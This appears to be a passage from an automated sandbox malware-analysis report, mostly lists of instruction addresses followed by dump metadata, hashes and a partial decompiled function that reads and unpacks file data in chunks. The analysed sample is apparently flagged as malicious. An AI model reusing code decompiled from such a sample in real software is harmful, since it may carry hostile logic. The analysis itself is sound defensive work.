                                                                                                                          0x00406ca2
                                                                                                                          0x0040754e
                                                                                                                          0x00000000
                                                                                                                          0x0040754e
                                                                                                                          0x00406cab
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cbe
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc4
                                                                                                                          0x00406cc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406cca
                                                                                                                          0x00406cd0
                                                                                                                          0x00406cfa
                                                                                                                          0x00406d00
                                                                                                                          0x00406d07
                                                                                                                          0x00000000
                                                                                                                          0x00406d07
                                                                                                                          0x00406cd6
                                                                                                                          0x00406cd9
                                                                                                                          0x00406cde
                                                                                                                          0x00406cde
                                                                                                                          0x00406ce9
                                                                                                                          0x00406cf1
                                                                                                                          0x00406cf4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d39
                                                                                                                          0x00406d3f
                                                                                                                          0x00406d42
                                                                                                                          0x00406d4f
                                                                                                                          0x00406d57
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d12
                                                                                                                          0x0040755d
                                                                                                                          0x00000000
                                                                                                                          0x0040755d
                                                                                                                          0x00406d1e
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d2c
                                                                                                                          0x00406d2f
                                                                                                                          0x00406d32
                                                                                                                          0x00406d37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073d4
                                                                                                                          0x004073da
                                                                                                                          0x004073e0
                                                                                                                          0x004073fa
                                                                                                                          0x004073fd
                                                                                                                          0x00407403
                                                                                                                          0x0040740e
                                                                                                                          0x00407410
                                                                                                                          0x004073e2
                                                                                                                          0x004073e2
                                                                                                                          0x004073f1
                                                                                                                          0x004073f5
                                                                                                                          0x004073f5
                                                                                                                          0x0040741a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d5f
                                                                                                                          0x00406d61
                                                                                                                          0x00406d64
                                                                                                                          0x00406dd5
                                                                                                                          0x00406dd8
                                                                                                                          0x00406ddb
                                                                                                                          0x00406de2
                                                                                                                          0x00406dec
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00406d66
                                                                                                                          0x00406d6a
                                                                                                                          0x00406d6d
                                                                                                                          0x00406d6f
                                                                                                                          0x00406d72
                                                                                                                          0x00406d75
                                                                                                                          0x00406d77
                                                                                                                          0x00406d7a
                                                                                                                          0x00406d7c
                                                                                                                          0x00406d81
                                                                                                                          0x00406d84
                                                                                                                          0x00406d87
                                                                                                                          0x00406d8b
                                                                                                                          0x00406d92
                                                                                                                          0x00406d95
                                                                                                                          0x00406d9c
                                                                                                                          0x00406da0
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406dac
                                                                                                                          0x00406daf
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcf
                                                                                                                          0x00000000
                                                                                                                          0x00406db1
                                                                                                                          0x00406db1
                                                                                                                          0x00406db4
                                                                                                                          0x00406db7
                                                                                                                          0x00406dba
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbf
                                                                                                                          0x00406dc2
                                                                                                                          0x00406dc4
                                                                                                                          0x00406dc5
                                                                                                                          0x00406dc8
                                                                                                                          0x00000000
                                                                                                                          0x00406dc8
                                                                                                                          0x00000000
                                                                                                                          0x00406ffe
                                                                                                                          0x00407002
                                                                                                                          0x00407020
                                                                                                                          0x00407023
                                                                                                                          0x0040702a
                                                                                                                          0x0040702d
                                                                                                                          0x00407030
                                                                                                                          0x00407033
                                                                                                                          0x00407036
                                                                                                                          0x00407039
                                                                                                                          0x0040703b
                                                                                                                          0x00407042
                                                                                                                          0x00407043
                                                                                                                          0x00407045
                                                                                                                          0x00407048
                                                                                                                          0x0040704b
                                                                                                                          0x0040704e
                                                                                                                          0x0040704e
                                                                                                                          0x00407053
                                                                                                                          0x00000000
                                                                                                                          0x00407053
                                                                                                                          0x00407004
                                                                                                                          0x00407007
                                                                                                                          0x0040700a
                                                                                                                          0x00407014
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070ab
                                                                                                                          0x004070af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070b5
                                                                                                                          0x004070b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070bf
                                                                                                                          0x004070c1
                                                                                                                          0x004070c5
                                                                                                                          0x004070c5
                                                                                                                          0x004070c8
                                                                                                                          0x004070cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040711c
                                                                                                                          0x00407120
                                                                                                                          0x00407127
                                                                                                                          0x0040712a
                                                                                                                          0x0040712d
                                                                                                                          0x00407137
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00407122
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407143
                                                                                                                          0x00407147
                                                                                                                          0x0040714e
                                                                                                                          0x00407151
                                                                                                                          0x00407154
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407157
                                                                                                                          0x0040715a
                                                                                                                          0x0040715d
                                                                                                                          0x0040715d
                                                                                                                          0x00407160
                                                                                                                          0x00407163
                                                                                                                          0x00407166
                                                                                                                          0x00407166
                                                                                                                          0x00407169
                                                                                                                          0x00407170
                                                                                                                          0x00407175
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407203
                                                                                                                          0x00407203
                                                                                                                          0x00407207
                                                                                                                          0x004075a5
                                                                                                                          0x00000000
                                                                                                                          0x004075a5
                                                                                                                          0x0040720d
                                                                                                                          0x00407210
                                                                                                                          0x00407213
                                                                                                                          0x00407217
                                                                                                                          0x0040721a
                                                                                                                          0x00407220
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407225
                                                                                                                          0x00407228
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406df8
                                                                                                                          0x00406df8
                                                                                                                          0x00406dfc
                                                                                                                          0x00407569
                                                                                                                          0x00000000
                                                                                                                          0x00407569
                                                                                                                          0x00406e02
                                                                                                                          0x00406e05
                                                                                                                          0x00406e08
                                                                                                                          0x00406e0c
                                                                                                                          0x00406e0f
                                                                                                                          0x00406e15
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e1a
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e20
                                                                                                                          0x00406e23
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e29
                                                                                                                          0x00406e2f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e35
                                                                                                                          0x00406e35
                                                                                                                          0x00406e39
                                                                                                                          0x00406e3c
                                                                                                                          0x00406e3f
                                                                                                                          0x00406e42
                                                                                                                          0x00406e45
                                                                                                                          0x00406e46
                                                                                                                          0x00406e49
                                                                                                                          0x00406e4b
                                                                                                                          0x00406e51
                                                                                                                          0x00406e54
                                                                                                                          0x00406e57
                                                                                                                          0x00406e5a
                                                                                                                          0x00406e5d
                                                                                                                          0x00406e60
                                                                                                                          0x00406e63
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e82
                                                                                                                          0x00406e85
                                                                                                                          0x00406e88
                                                                                                                          0x00406e8f
                                                                                                                          0x00406e93
                                                                                                                          0x00406e95
                                                                                                                          0x00406e99
                                                                                                                          0x00406e65
                                                                                                                          0x00406e65
                                                                                                                          0x00406e69
                                                                                                                          0x00406e71
                                                                                                                          0x00406e76
                                                                                                                          0x00406e78
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e9c
                                                                                                                          0x00406ea3
                                                                                                                          0x00406ea6
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb5
                                                                                                                          0x00407575
                                                                                                                          0x00000000
                                                                                                                          0x00407575
                                                                                                                          0x00406ebb
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ec5
                                                                                                                          0x00406ec8
                                                                                                                          0x00406ece
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed3
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406edc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ede
                                                                                                                          0x00406ee1
                                                                                                                          0x00406ee4
                                                                                                                          0x00406ee7
                                                                                                                          0x00406eea
                                                                                                                          0x00406eed
                                                                                                                          0x00406ef0
                                                                                                                          0x00406ef3
                                                                                                                          0x00406ef6
                                                                                                                          0x00406ef9
                                                                                                                          0x00406efc
                                                                                                                          0x00406f14
                                                                                                                          0x00406f17
                                                                                                                          0x00406f1a
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f20
                                                                                                                          0x00406f24
                                                                                                                          0x00406f26
                                                                                                                          0x00406efe
                                                                                                                          0x00406efe
                                                                                                                          0x00406f06
                                                                                                                          0x00406f0b
                                                                                                                          0x00406f0d
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f29
                                                                                                                          0x00406f30
                                                                                                                          0x00406f33
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00406f33
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f75
                                                                                                                          0x00406f75
                                                                                                                          0x00406f79
                                                                                                                          0x00407581
                                                                                                                          0x00000000
                                                                                                                          0x00407581
                                                                                                                          0x00406f7f
                                                                                                                          0x00406f82
                                                                                                                          0x00406f85
                                                                                                                          0x00406f89
                                                                                                                          0x00406f8c
                                                                                                                          0x00406f92
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f97
                                                                                                                          0x00406f9a
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00000000
                                                                                                                          0x00406f41
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fbd
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fe8
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fed
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407056
                                                                                                                          0x00407056
                                                                                                                          0x00407059
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073bb
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00000000
                                                                                                                          0x00407489
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c7
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x0040744d
                                                                                                                          0x00407447
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074eb
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x0040751d
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00407447
                                                                                                                          0x004073ce
                                                                                                                          0x004073cb

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                          • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                                          • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                          • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00403479(intOrPtr _a4) {
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				signed int _t12;
                                                                                                                          				void* _t14;
                                                                                                                          				void* _t15;
                                                                                                                          				long _t16;
                                                                                                                          				void* _t18;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				long _t32;
                                                                                                                          				intOrPtr _t34;
                                                                                                                          				intOrPtr _t36;
                                                                                                                          				void* _t37;
                                                                                                                          				intOrPtr _t49;
                                                                                                                          
                                                                                                                          				_t32 =  *0x420ef4; // 0x52b8
                                                                                                                          				_t34 = _t32 -  *0x40ce60 + _a4;
                                                                                                                          				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                                                                          				if(_t34 <= 0) {
                                                                                                                          					L22:
                                                                                                                          					E0040302E(1);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				E004035F8( *0x420f04);
                                                                                                                          				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                                                          				 *0x420f00 = _t34;
                                                                                                                          				 *0x420ef0 = 0;
                                                                                                                          				while(1) {
                                                                                                                          					_t10 =  *0x420ef8; // 0x7e959
                                                                                                                          					_t31 = 0x4000;
                                                                                                                          					_t11 = _t10 -  *0x420f04;
                                                                                                                          					if(_t11 <= 0x4000) {
                                                                                                                          						_t31 = _t11;
                                                                                                                          					}
                                                                                                                          					_t12 = E004035E2(0x414ef0, _t31);
                                                                                                                          					if(_t12 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					 *0x420f04 =  *0x420f04 + _t31;
                                                                                                                          					 *0x40ce80 = 0x414ef0;
                                                                                                                          					 *0x40ce84 = _t31;
                                                                                                                          					L6:
                                                                                                                          					L6:
                                                                                                                          					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                                                                          						_t19 =  *0x420f00; // 0x20193
                                                                                                                          						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                                                          						E0040302E(0);
                                                                                                                          					}
                                                                                                                          					 *0x40ce88 = 0x40cef0;
                                                                                                                          					 *0x40ce8c = 0x8000; // executed
                                                                                                                          					_t14 = E00406BB0(0x40ce68); // executed
                                                                                                                          					if(_t14 < 0) {
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					_t36 =  *0x40ce88; // 0x413ad5
                                                                                                                          					_t37 = _t36 - 0x40cef0;
                                                                                                                          					if(_t37 == 0) {
                                                                                                                          						__eflags =  *0x40ce84; // 0x0
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _t31;
                                                                                                                          						if(_t31 == 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						L16:
                                                                                                                          						_t16 =  *0x420ef4; // 0x52b8
                                                                                                                          						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                                                          					if(_t18 == 0) {
